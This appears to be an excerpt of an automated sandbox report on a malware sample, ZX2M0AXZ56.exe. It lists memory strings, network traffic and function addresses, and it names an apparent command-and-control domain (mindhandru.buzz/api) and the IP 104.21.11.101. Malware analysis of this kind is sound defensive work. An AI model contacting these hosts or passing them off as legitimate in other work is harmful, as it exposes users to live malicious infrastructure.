Source: ZX2M0AXZ56.exe, 00000005.00000002.2235693260.0000000005304000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2223846655.0000000005304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/2
Source: ZX2M0AXZ56.exe, 00000005.00000002.2235693260.0000000005304000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2223846655.0000000005304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/P
Source: ZX2M0AXZ56.exe, 00000005.00000003.1404897117.000000000095D000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2223181077.0000000005319000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api
Source: ZX2M0AXZ56.exe, 00000005.00000003.1944890459.000000000531A000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1944689197.0000000005313000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api.
Source: ZX2M0AXZ56.exe, 00000005.00000003.1404995967.0000000000986000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404897117.0000000000975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apiW
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885226655.000000000531A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apieed0
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885226655.000000000531A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apine
Source: ZX2M0AXZ56.exe, 00000005.00000003.1948129242.000000000542C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ZX2M0AXZ56.exe, 00000005.00000003.1948129242.000000000542C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: ZX2M0AXZ56.exe, 00000005.00000003.1948129242.000000000542C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: ZX2M0AXZ56.exe, 00000005.00000003.1948129242.000000000542C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: ZX2M0AXZ56.exe, 00000005.00000003.1948129242.000000000542C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: ZX2M0AXZ56.exe, 00000005.00000003.1948129242.000000000542C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ZX2M0AXZ56.exe, 00000005.00000003.1948129242.000000000542C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49899 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: ZX2M0AXZ56.exe	Static PE information: section name:
Source: ZX2M0AXZ56.exe	Static PE information: section name: .rsrc
Source: ZX2M0AXZ56.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_0532092E	5_3_0532092E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004F0460	5_2_004F0460
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004B8600	5_2_004B8600
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004BE687	5_2_004BE687
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004F0D20	5_2_004F0D20
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004E8EA0	5_2_004E8EA0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004C1227	5_2_004C1227
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004E9280	5_2_004E9280
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004DD34A	5_2_004DD34A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D7440	5_2_004D7440
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004C57C0	5_2_004C57C0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D1D00	5_2_004D1D00
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0056007F	5_2_0056007F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005BA077	5_2_005BA077
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005B806A	5_2_005B806A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F0065	5_2_005F0065
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00592067	5_2_00592067
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00530010	5_2_00530010
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005C4016	5_2_005C4016
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0053A01C	5_2_0053A01C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00582008	5_2_00582008
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005A400A	5_2_005A400A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D8008	5_2_005D8008
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0053403E	5_2_0053403E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004DA0CA	5_2_004DA0CA
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005EE0D2	5_2_005EE0D2
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005500C1	5_2_005500C1
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004C60E9	5_2_004C60E9
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006120C9	5_2_006120C9
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004DC0E6	5_2_004DC0E6
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005CA0EE	5_2_005CA0EE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00572097	5_2_00572097
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005C609A	5_2_005C609A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006080AE	5_2_006080AE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0054009B	5_2_0054009B
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004DC09E	5_2_004DC09E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0057A08F	5_2_0057A08F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006040BD	5_2_006040BD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00618081	5_2_00618081
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0062808E	5_2_0062808E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004DC09E	5_2_004DC09E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0057814E	5_2_0057814E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0058A145	5_2_0058A145
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004C8169	5_2_004C8169
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004B6160	5_2_004B6160
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005EC160	5_2_005EC160
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0054616B	5_2_0054616B
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0056C117	5_2_0056C117
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0057E11F	5_2_0057E11F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0059E13F	5_2_0059E13F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0055212D	5_2_0055212D
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D0120	5_2_005D0120
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D81CC	5_2_004D81CC
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005A41D3	5_2_005A41D3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006001F0	5_2_006001F0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D21C8	5_2_005D21C8
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0051C1E0	5_2_0051C1E0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00528192	5_2_00528192
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004DE180	5_2_004DE180
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006141AF	5_2_006141AF
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00532184	5_2_00532184
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0057018F	5_2_0057018F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006241BE	5_2_006241BE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00610187	5_2_00610187
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E01B5	5_2_005E01B5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005AE1A8	5_2_005AE1A8
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0060219F	5_2_0060219F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052C25F	5_2_0052C25F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00622275	5_2_00622275
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004B4270	5_2_004B4270
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00606221	5_2_00606221
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0054A205	5_2_0054A205
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0058E201	5_2_0058E201
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0054E209	5_2_0054E209
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E223F	5_2_005E223F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0056823F	5_2_0056823F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005B6232	5_2_005B6232
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004CE220	5_2_004CE220
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00620212	5_2_00620212
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00618212	5_2_00618212
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00626211	5_2_00626211
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F4229	5_2_005F4229
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D6220	5_2_005D6220
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00590227	5_2_00590227
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005382C5	5_2_005382C5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D42D0	5_2_004D42D0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052A2F3	5_2_0052A2F3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005FC2FD	5_2_005FC2FD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E02F9	5_2_005E02F9
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005A2292	5_2_005A2292
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005B4288	5_2_005B4288
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00570282	5_2_00570282
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005AC281	5_2_005AC281
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005A02BA	5_2_005A02BA
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005C82B5	5_2_005C82B5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00566352	5_2_00566352
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00512356	5_2_00512356
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0055835E	5_2_0055835E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00580356	5_2_00580356
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0062C376	5_2_0062C376
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00576340	5_2_00576340
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005A8373	5_2_005A8373
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F8376	5_2_005F8376
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005B2376	5_2_005B2376
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0059C318	5_2_0059C318
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00624331	5_2_00624331
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00526308	5_2_00526308
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0062A33E	5_2_0062A33E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005743D5	5_2_005743D5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D83D8	5_2_004D83D8
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0061A3FF	5_2_0061A3FF
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F239F	5_2_005F239F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0057C39B	5_2_0057C39B
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0051C384	5_2_0051C384
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005623B5	5_2_005623B5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D63AE	5_2_005D63AE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005283AB	5_2_005283AB
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005563A9	5_2_005563A9
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0060C460	5_2_0060C460
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00524451	5_2_00524451
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005FE458	5_2_005FE458
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00596452	5_2_00596452
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00584455	5_2_00584455
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004EA440	5_2_004EA440
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0053045C	5_2_0053045C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005CC448	5_2_005CC448
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00608474	5_2_00608474
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0055047A	5_2_0055047A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0055A418	5_2_0055A418
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005EC410	5_2_005EC410
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0058240D	5_2_0058240D
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00588404	5_2_00588404
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052243E	5_2_0052243E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052043C	5_2_0052043C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0054443B	5_2_0054443B
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00554425	5_2_00554425
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00508422	5_2_00508422
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00542429	5_2_00542429
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D84D8	5_2_005D84D8
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D04C6	5_2_004D04C6
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006124EA	5_2_006124EA
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005B04D7	5_2_005B04D7
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005804C8	5_2_005804C8
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0051E4CD	5_2_0051E4CD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D24E0	5_2_004D24E0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0051A4E0	5_2_0051A4E0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005CA4ED	5_2_005CA4ED
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D0495	5_2_005D0495
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0059E48B	5_2_0059E48B
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005DC48A	5_2_005DC48A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F0486	5_2_005F0486
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E8485	5_2_005E8485
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052648F	5_2_0052648F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005984BA	5_2_005984BA
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0053A557	5_2_0053A557
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005C0550	5_2_005C0550
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00620575	5_2_00620575
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0066C578	5_2_0066C578
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0060E543	5_2_0060E543
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D4560	5_2_004D4560
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0056056F	5_2_0056056F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005C2515	5_2_005C2515
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005DE511	5_2_005DE511
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00564519	5_2_00564519
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0060450A	5_2_0060450A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00552539	5_2_00552539
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0053253E	5_2_0053253E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004DC53C	5_2_004DC53C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005EC5D2	5_2_005EC5D2
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F45D0	5_2_005F45D0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004EA5D4	5_2_004EA5D4
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0057C5CD	5_2_0057C5CD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005FC5C5	5_2_005FC5C5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005CE5FD	5_2_005CE5FD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052C5FA	5_2_0052C5FA
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005165FE	5_2_005165FE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004B65F0	5_2_004B65F0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E25E1	5_2_005E25E1
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005AE5BE	5_2_005AE5BE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0056E5B3	5_2_0056E5B3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004EC5A0	5_2_004EC5A0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0053E5A6	5_2_0053E5A6
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005BE5AC	5_2_005BE5AC
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052E5AD	5_2_0052E5AD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005AA65A	5_2_005AA65A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0061E674	5_2_0061E674
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004E8650	5_2_004E8650
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0054C602	5_2_0054C602
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004CE630	5_2_004CE630
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005826D8	5_2_005826D8
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005966D5	5_2_005966D5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E46C5	5_2_005E46C5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005906C5	5_2_005906C5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D46D0	5_2_004D46D0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006266CD	5_2_006266CD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005A66EE	5_2_005A66EE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005686EF	5_2_005686EF
